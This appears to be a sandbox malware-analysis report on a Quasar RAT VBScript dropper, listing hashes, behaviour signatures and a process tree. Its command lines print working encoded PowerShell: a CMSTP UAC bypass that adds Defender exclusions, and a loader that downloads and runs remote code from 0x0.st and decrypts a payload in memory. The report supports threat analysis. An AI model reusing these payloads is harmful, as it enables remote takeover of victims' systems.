Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
114s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
30/01/2025, 08:26
Static task
static1
Behavioral task
behavioral1
Sample
tt.vbs
Resource
win7-20240903-en
General
-
Target
tt.vbs
-
Size
274KB
-
MD5
1c83c6f80fcddabd1336cc30aa68d08f
-
SHA1
bb9c75690963d7c2bb608d5fb3b9b627b1bc4e34
-
SHA256
0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7
-
SHA512
832d55005c9192456337f840d409d79c6786fd8d2c97bb33ed04193903564ae3b4d31da0842cc522add532e4fb5b86a231890be90a4e0471b28276f57345d44a
-
SSDEEP
6144:eUQydS/Z5QL2AEhyNqfrASLddf9USsPgd5QxwNsCQOod2zf:UyduQLnEh4qjASj9USsIP0wNPQ2zf
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/464-100-0x0000000008800000-0x000000000885E000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 464 powershell.exe 17 464 powershell.exe 20 464 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1532 powershell.exe 4564 powershell.exe 464 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_726 = "wscript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate_726.vbs\"" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Kills process with taskkill 1 IoCs
pid Process 4212 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1532 powershell.exe 1532 powershell.exe 4564 powershell.exe 4564 powershell.exe 464 powershell.exe 464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 4564 powershell.exe Token: SeDebugPrivilege 4212 taskkill.exe Token: SeDebugPrivilege 464 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 464 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3228 wrote to memory of 2124 3228 WScript.exe 83 PID 3228 wrote to memory of 2124 3228 WScript.exe 83 PID 2124 wrote to memory of 3476 2124 cmd.exe 86 PID 2124 wrote to memory of 3476 2124 cmd.exe 86 PID 3476 wrote to memory of 1532 3476 cmd.exe 88 PID 3476 wrote to memory of 1532 3476 cmd.exe 88 PID 1532 wrote to memory of 2192 1532 powershell.exe 92 PID 1532 wrote to memory of 2192 1532 powershell.exe 92 PID 2192 wrote to memory of 4276 2192 csc.exe 93 PID 2192 wrote to memory of 4276 2192 csc.exe 93 PID 1532 wrote to memory of 2336 1532 powershell.exe 94 PID 1532 wrote to memory of 2336 1532 powershell.exe 94 PID 3476 wrote to memory of 464 3476 cmd.exe 100 PID 3476 wrote to memory of 464 3476 cmd.exe 100 PID 3476 wrote to memory of 464 3476 cmd.exe 100
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tt.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnflfy0t\xnflfy0t.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9635.tmp" "c:\Users\Admin\AppData\Local\Temp\xnflfy0t\CSCDFED3A772E394210AA58B5AA5AB2C29A.TMP"6⤵PID:4276
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\vwalkctu.inf5⤵PID:2336
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gdW5xbXFibGJqbnBiempnKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnakZzSUxYMnhsKzBOYVJ0eGVzZ3Z2NURCdmpybmM5TmVIdVlHWFdzL09oQT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3E5aElSZmtwSTU4NHJqSi9CdGpwK3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaGl6bGF6ZmNwb2Rramx2KCRwYXJhbV92YXIpewlJRVggJyRkaWJzdmh1d2xwYW93Y3J2dmVueWZwdXJkPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHBsYXhucWJwbmpnemdvem1sb3dhbGl6eXQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRoZ3ducW5va3Bmd3V6eHl5emp0a3ZwcW9tPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGRpYnN2aHV3bHBhb3djcnZ2ZW55ZnB1cmQsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGhnd25xbm9rcGZ3dXp4eXl6anRrdnBxb20uQ29weVRvKCRwbGF4bnFicG5qZ3pnb3ptbG93YWxpenl0KTsJJGhnd25xbm9rcGZ3dXp4eXl6anRrdnBxb20uRGlzcG9zZSgpOwkkZGlic3ZodXdscGFvd2NydnZlbnlmcHVyZC5EaXNwb3NlKCk7CSRwbGF4bnFicG5qZ3pnb3ptbG93YWxpenl0LkRpc3Bvc2UoKTsJJHBsYXhucWJwbmpnemdvem1sb3dhbGl6eXQuVG9BcnJheSgpO31mdW5jdGlvbiB0cHV3cHVramJxbHBncGd3dW50Zm5wZ3NkKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckdGJ5cXJnbGJlZmtmYnh2c29xaWRybXF5Ym16Zm94c3FpYnhtcHR4ej1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGt0dXNvdHhseXJneWhrdWdrYW9maGZuZ251d2FhaWN2c2lzeXN5amlvbmh3cXRpeGdxPSR0YnlxcmdsYmVma2ZieHZzb3FpZHJtcXlibXpmb3hzcWlieG1wdHh6LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGt0dXNvdHhseXJneWhrdWdrYW9maGZuZ251d2FhaWN2c2lzeXN5amlvbmh3cXRpeGdxLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kamJqY2xwaXZqamh0YW5xY3lybnV0Y3RzeiA9ICRlbnY6VVNFUk5BTUU7JGlpdHJvZWdndXpoeHN5cHJyd29wdHNkZ3cgPSAnQzpcVXNlcnNcJyArICRqYmpjbHBpdmpqaHRhbnFjeXJudXRjdHN6ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaWl0cm9lZ2d1emh4c3lwcnJ3b3B0c2RndzskdXVwZmc9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRpaXRyb2VnZ3V6aHhzeXBycndvcHRzZGd3KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgka3FhIGluICR1dXBmZykgewlpZiAoJGtxYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkcWZtdXQ9JGtxYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZHVrdmJwenFzbXhrb2plbmx5b29reXlwdz1bc3RyaW5nW11dJHFmbXV0LlNwbGl0KCdcJyk7SUVYICckYXhocHBhaXl3bXNwbnV4ZnJpZXNnZm15bz1oaXpsYXpmY3BvZGtqbHYgKHVucW1xYmxiam5wYnpqZyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkdWt2YnB6cXNteGtvamVubHlvb2t5eXB3WzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHpvc3NnZnZ2emFzcmJjbXBsc3dseHlkcmo9aGl6bGF6ZmNwb2Rramx2ICh1bnFtcWJsYmpucGJ6amcgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZHVrdmJwenFzbXhrb2plbmx5b29reXlwd1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt0cHV3cHVramJxbHBncGd3dW50Zm5wZ3NkICRheGhwcGFpeXdtc3BudXhmcmllc2dmbXlvICRudWxsO3RwdXdwdWtqYnFscGdwZ3d1bnRmbnBnc2QgJHpvc3NnZnZ2emFzcmJjbXBsc3dseHlkcmogKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:464
-
-
-
-
